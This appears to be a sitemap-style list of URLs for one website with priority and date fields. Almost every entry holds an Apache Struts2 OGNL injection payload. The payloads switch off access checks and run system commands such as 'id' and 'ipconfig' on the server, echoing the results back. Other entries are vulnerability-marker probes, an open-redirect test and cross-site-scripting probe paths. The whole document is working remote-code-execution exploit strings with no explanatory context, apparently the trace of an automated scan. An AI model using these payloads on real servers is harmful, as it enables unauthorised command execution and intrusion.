http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=nbf8t 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm56928%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem49981?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm18561%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem67134?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=nbf8t? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=fsm58813%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem86673 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm67397%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem85823?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm58813%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem86673?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=jo17b? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=fsm58813%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem86673? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=g7xbu? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 